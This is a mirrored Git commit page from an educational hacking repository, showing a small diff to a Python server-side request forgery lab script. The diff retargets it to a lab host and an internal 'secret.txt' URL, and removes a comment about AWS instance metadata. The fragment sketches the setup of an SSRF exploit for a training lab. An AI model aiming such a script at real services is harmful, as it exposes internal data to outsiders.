mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-27 13:10:18 +00:00
Merge pull request #164 from The-Art-of-Hacking/santosomar-patch-7
Update ssrf_galatic_archives.py
This commit is contained in:
commit
8ef5602af9
1 changed files with 2 additions and 3 deletions
|
@ -6,11 +6,10 @@ Author: Omar Santos @santosomar
|
|||
import requests
|
||||
|
||||
# The URL of the vulnerable web service.
|
||||
vulnerable_url = 'http://127.0.0.1:5000'
|
||||
vulnerable_url = 'http://10.6.6.20:5000'
|
||||
|
||||
# The internal URL that the attacker wants to access.
|
||||
# AWS EC2 instances use this URL to provide instance metadata.
|
||||
# This data should be inaccessible from outside the EC2 instance.
|
||||
# This is to simulate that this data (secret.txt) should be inaccessible from attacker's network.
|
||||
internal_url = 'https://internal.secretcorp.org/secret.txt'
|
||||
|
||||
# The attacker constructs the exploit URL by appending the internal URL
|
||||
|
|
Loading…
Reference in a new issue